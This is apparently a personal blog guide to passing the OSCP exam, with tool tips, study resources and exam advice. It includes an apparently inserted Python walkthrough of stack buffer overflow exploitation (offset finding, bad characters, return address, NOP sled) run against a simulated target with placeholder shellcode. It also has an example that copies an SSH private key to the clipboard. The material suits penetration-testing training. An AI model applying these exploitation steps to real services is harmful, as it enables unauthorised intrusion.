
codebear_unkoalified_oscp_guide's Introduction

The Unkoalified OSCP Guide

updated 2nd December 2019

UPDATE: I have since learned you have to do some lab time before attempting an exam. Get the shortest amount and do what's suggested here.

Offensive Security says "Try Harder!" I say "Try Google!".

Up front I don't think you need to pay for any more than the minimum lab time to pass the exam.

I'm going to recommend you pay for a few things, but they will be cheaper than paying for even the shortest lab time. As a disclaimer, I receive no payment from any of the recommendations; it's just what I personally use.

Hopefully you'll find this blog post short and helpful so let's get into it.


My Background

When I first started I had no background in pentesting. What I had done was maybe three of the easy Hack The Box machines.

Tools you'll need

Something to run your virtual machine. I use VMware Workstation Pro; I paid for this license because I use it for work as well. If you're going to keep doing stuff like this then I think it's a good investment. If you just want to try OSCP out, use VMware Player, which will do the same thing but is free.

The latest stable Kali Linux 64-bit. If you did purchase the PWK course it will recommend using theirs, but it is riddled with problems and you only need it for one course exercise.

At this point I can't even remember how I started learning about VMWare but I'm sure you can Try Google!

Once it's installed there are a few key tools in Kali that I used all the time:

  • Cherry Tree - This should be installed by default and I will show you how I took notes later.
  • tmux - An easy-to-use terminal multiplexer (split panes, multiple windows, sessions that survive a closed terminal): sudo apt-get install tmux. Ham Vocke has a good blog here.
  • xclip - Lets you cat a file and pipe it to xclip -sel c, which puts the contents onto your clipboard (cat id_rsa | xclip -sel c). Install with sudo apt-get install xclip.
  • nmapautomator - The enumeration tool I use for HTB and all of the exam machines. The user 21y4d created the tool to use during their OSCP exam, check it out here.

What to study

These suggestions are somewhat in order.

I had no idea how to get around in Linux or the tricks of the command line. Over The Wire's Bandit is awesome and it's free!

Hack The Box... goes without saying. Buy a VIP subscription! This will allow you to do the retired boxes. Then do the following:

  1. Complete the boxes compiled by tjnull which can be found here. If you want to read the blog post look here.
  2. Try the boxes in order (it's kind of a difficulty rating). When you get stuck, watch how IppSec does it and then continue on by yourself.
  3. On each machine take notes in Cherry Tree. I used a template like the image below and then stored extra information about the machine like nmap scans or ssh keys in sub nodes. This was a suggestion from my friend Apr4h, make sure to check out their work.

process image

The buffer overflow box is just a skill you learn: find the offset to EIP, find the bad characters, point EIP at a JMP ESP and drop your shellcode after it. justinsteven wrote a great tutorial called dostackbufferoverflowgood. Make sure you do the exercises and don't just read the PDF. You'll need a Windows VM networked in VMware to exploit some of the examples.
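The same workflow, written out as a small Python helper so you can see each step run end to end. This is an added example, not code from this guide or from dostackbufferoverflowgood. The simulated_crash function, its 146-byte buffer and the return address 0x625011AF are made-up stand-ins for a real target (on the exam box the pattern goes over the network and the EIP value is read from the debugger), and the 32 bytes of 0xCC are a placeholder, not working shellcode.

```python
import string
import struct


def pattern_create(length):
    """Cyclic pattern in the style of Metasploit's pattern_create.rb:
    every 3-byte window is unique, so a 4-byte EIP value maps to one offset."""
    out = []
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                out.append(a + b + c)
                if len(out) * 3 >= length:
                    return "".join(out)[:length].encode()
    return "".join(out)[:length].encode()


def pattern_offset(pattern, eip_value):
    """Offset of the 4 bytes that landed in EIP. The debugger shows EIP as a
    little-endian x86 value, so pack it back into buffer order before
    searching. Returns -1 if the value is not part of the pattern."""
    return pattern.find(struct.pack("<I", eip_value))


def badchar_string(exclude=(0x00,)):
    """Every byte value except the ones already known to be bad. Send this
    after the offset and compare what lands on the stack with what was sent;
    the first byte that differs (or cuts the string short) is the next bad
    character to add to exclude."""
    return bytes(b for b in range(256) if b not in exclude)


def build_payload(offset, ret_addr, shellcode, nop_count=16):
    """[junk up to EIP][EIP = address of a JMP ESP][NOP sled][shellcode]."""
    return (b"A" * offset
            + struct.pack("<I", ret_addr)
            + b"\x90" * nop_count
            + shellcode)


# Constructed stand-in for the crashing service (hypothetical, not a real
# binary): a 146-byte stack buffer, 4 bytes of saved EBP, then the saved
# return address. Returns the value that would end up in EIP on return.
BUF_SIZE = 146


def simulated_crash(data):
    frame = data[:BUF_SIZE + 8].ljust(BUF_SIZE + 8, b"\x00")
    return struct.unpack("<I", frame[BUF_SIZE + 4:BUF_SIZE + 8])[0]


def run_workflow():
    """Crash with a pattern, compute the offset, rebuild the payload and
    confirm EIP now holds the chosen return address."""
    pattern = pattern_create(400)
    eip = simulated_crash(pattern)
    offset = pattern_offset(pattern, eip)
    payload = build_payload(offset, 0x625011AF, b"\xcc" * 32)  # placeholder shellcode
    return offset, simulated_crash(payload)


if __name__ == "__main__":
    offset, eip = run_workflow()
    print(f"offset to EIP: {offset}, EIP after exploit: {eip:#010x}")
```

Against a real service you replace simulated_crash with a socket send and read EIP in the debugger; the order of steps (pattern, offset, bad characters, return address, payload) is what the exam box is testing, so practise it until you can do it without notes.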

What to read

Google "how to pass OSCP" and read as many blogs as you can, they will all give you references. Save references as bookmarks if you find them useful.

Save the exploits you use in HTB and document how you used them so you can replicate it during the exam if you need to.

Your own documentation will be invaluable.

Exam

Tips:

  • Eat good food.
  • Take breaks.
  • Have a good night's sleep.
  • Have a doggo keep you company.


I had two attempts:

  1. I spent way too long on the buffer overflow machine but in the end I think the binary on the test machine was different from the victim machine.
  2. I pretty much followed the advice I'm giving here and got the buffer overflow in under 2 hours. Then I got both 20pt machines and the 10pt machine. All of these I got root on in less than 12 hours, and then had a good sleep and spent the rest of the time trying to get the 25pt machine.

Get your exam ticket and book a time that is good for you. I started around 7am both times so I was fresh from a good night's sleep.

There are 5 exam machines:

  1. 25pts = buffer overflow (follow the process, pretty easy)
  2. 25pts = hard machine (multiple vulnerabilities strung together)
  3. 20pts = med machine (pretty easily found open source)
  4. 20pts = med machine (pretty easily found open source)
  5. 10pts = easy machine (should be obvious single step)

Report

whoisflynn passed their exam with an updated template. I found it easy to use; check it out on whoisflynn's GitHub page.

Conclusion

So what's the final cost?

  • HTB VIP membership
  • Minimum OSCP lab time + exam ticket
  • Time.

I achieved my goal of completing what I've just listed above before doing my exam and I passed (the second time).

Don't be afraid of failing the first time either. You'll gain valuable experience and figure out your weaknesses. Plus it's much cheaper than purchasing the labs.
